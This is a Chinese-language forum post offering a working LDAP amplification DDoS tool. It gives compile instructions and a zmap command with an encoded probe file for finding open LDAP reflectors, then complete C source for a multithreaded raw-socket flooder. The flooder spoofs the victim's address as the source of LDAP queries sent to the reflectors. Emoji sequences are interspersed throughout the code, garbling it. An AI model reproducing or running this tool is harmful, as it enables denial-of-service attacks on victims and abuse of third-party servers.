ldap放大DDOS |
|
ldap放大汉化源码
安装环境指令: 乌班图/Debian系统: apt install gcc -y centos系统:👩✈️🧥🛋🤪💅 yum install gcc -y 编译指令: gcc ldap.c -o ldap -pthread -std=gnu99 最后输入 ./ldap👩✈️👞🦯😔👁 查看使用方法 注意:本脚本完全开源免费,请勿使用任何已编译版本,使用本脚本必须拥有root权限,否则无法运行该脚本 如何扫描列表呢?请输入一下指令: 组成探针: echo -ne '30\x84\x00\x00\x00\x2D\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0A\x01\x00\x0A\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0B\x6F\x62\x6A\x65\x63\x74\x63\x6C\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00\x0A' > ldap.pkt🧑⚕️🧥📷😔👀 扫描指令: zmap -p 389 --probe-module=udp --probe-args="file:ldap.pkt" --output-file=ldap.txt ✌🚠🍍ℹ🦕 #include <time.h> #include <pthread.h> #include <unistd.h> #include <stdio.h> 👄🦼🍍🅱🐴 #include <stdlib.h>#include <string.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/udp.h> 🧑🍳💄🩸🤪✊ #include <arpa/inet.h> #include <strings.h> #define MAX_PACKET_SIZE 8192 #define PHI 0x9e3779b9 static uint32_t Q[4096], c = 362436; 🦴🌦🍟💲🐶struct list { struct sockaddr_in data; struct list *next; struct list *prev; 👍🛩🥩🔞🐥}; struct list *head; volatile int tehport; volatile int limiter; volatile unsigned int pps;👨🚒🩳🔭✍ volatile unsigned int sleeptime = 100; struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; }; void init_rand(uint32_t x) { int i; 🧒🧦📀🤬🤙 Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) {🧑🍳👗🏮🤪🙌 Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } } uint32_t rand_cmwc(void) { 👩🩴📱😷👁 uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c;👵💎🖥🙃👍 c = (t >> 32); x = t + c; if (x < c) { x++; c++;👨🦱👜🩺😄👈 } return (Q[i] = r - x); } unsigned short csum (unsigned short *buf, int nwords) { 🥷🧢💊😆👏 unsigned long sum = 0; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); 👳🥾🔒😳🦷 return (unsigned short)(~sum); } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5;👮♂️🧥🪓😶✋ iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 67; iph->id = htons(54321); iph->frag_off = 0; 👴💍📮🥲👍 iph->ttl = MAXTTL; iph->protocol = IPPROTO_UDP; iph->check = 0; iph->saddr = inet_addr("192.168.3.100"); }🧓🎒🗡💩👆 void setup_udp_header(struct udphdr *udph) { udph->source = htons(5678); udph->dest = htons(389); udph->check = 0;👳🛍🗑😴👄 memcpy((void *)udph + sizeof(struct udphdr), "\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00", 67); udph->len=htons(sizeof(struct udphdr) + 67); } void *flood(void *par1) { 👁⛪🦀🆚🐒 struct thread_data *td = (struct thread_data *)par1; char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr); struct sockaddr_in sin = td->sin; 👌🚤🥚♊🦊 struct list *list_node = td->list_node; int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ printf("无法打开原始套接字,请问是否root?\n"); exit(-1);🧑🚀👜💰🤪🤝 } init_rand(time(NULL)); memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_udp_header(udph); 🤙🗼🥣📳🐝 udph->source = htons(rand() % 65535 - 1026);iph->saddr = sin.sin_addr.s_addr; iph->daddr = list_node->data.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); int tmp = 1; 👌🗽🍌📵🐢 const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ printf("无法设置IP_HDRINCL 请问是否root?\n"); exit(-1); }👨🎨🩴🦯🤖👊 init_rand(time(NULL)); register unsigned int i; i = 0; while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data)); 👄🍟♂🐒 list_node = list_node->next;iph->daddr = list_node->data.sin_addr.s_addr; iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); 🤞🗼🥄📶🦌 pps++;if(i >= limiter) { i = 0; usleep(sleeptime); 🤟🚤🍖☯🕊 }i++; } } int main(int argc, char *argv[ ]) ✋🚤🍒🆒🐕{ if(argc < 6){ printf("无效的参数\n"); fprintf(stdout, "用法: %s <IP> <端口> <LDAP 列表> <线程> <每秒pps限制 (-1无限制)> <时间>\n", argv[0]); exit(-1);🧑⚕️🩴⚒🙄👊 } srand(time(NULL)); int i = 0; head = NULL; printf("[+] 开始攻击... [+]\n");🧑⚕️👑🛒😃🦴 int max_len = 128; char *buffer = (char *) malloc(max_len); buffer = memset(buffer, 0x00, max_len); int num_threads = atoi(argv[4]); int maxpps = atoi(argv[5]);👩🛍🧬😍✋ limiter = 0; pps = 0; int multiplier = 20; FILE *list_fd = fopen(argv[3], "r"); while (fgets(buffer, max_len, list_fd) != NULL) { 🤳🛑🍧❗🦚 if ((buffer[strlen(buffer) - 1] == '\n') || (buffer[strlen(buffer) - 1] == '\r')) { buffer[strlen(buffer) - 1] = 0x00; if(head == NULL) {🧑💻🥼📡🙂💪 head = (struct list *)malloc(sizeof(struct list)); memset(&head->data, 0, sizeof(head->data)); head->data.sin_addr.s_addr=inet_addr(buffer); head->next = head; head->prev = head; 👵🧦🔑😥👄 } else { struct list *new_node = (struct list *)malloc(sizeof(struct list)); memset(new_node, 0x00, sizeof(struct list)); new_node->data.sin_addr.s_addr=inet_addr(buffer); new_node->prev = head;👦🧦💶😅🧠 new_node->next = head->next; head->next = new_node; } i++; } else { 🧑⚕️👒🛏🤖🤟 continue; } } struct list *current = head->next; pthread_t thread[num_threads];👳👠📬😆👍 struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); struct thread_data td[num_threads]; for(i = 0;i<num_threads;i++){ 🤞🏝🍚🈳🦮 td[i].thread_id = i; td[i].sin= sin; td[i].list_node = current; pthread_create( &thread[i], NULL, &flood, (void *) &td[i]); } 👂🎢🫖☪🐖 for(i = 0;i<(atoi(argv[6])*multiplier);i++) { usleep((1000/multiplier)*1000); if((pps*multiplier) > maxpps) { 👨⚕️💄📞😂🤝 if(1 > limiter) { sleeptime+=100; } else { limiter--; 👨🎨👒🧻😶👃 } } else { limiter++; if(sleeptime > 25) { 👨🦱🧢🧹😃👃 sleeptime-=25; } else { sleeptime = 0; } } 👃🪐🍊♑🪰 pps = 0;} return 0; }
帖子热度 2079 ℃
|
|
|
「龙战于野」
2025-2-23 01:05
变色卡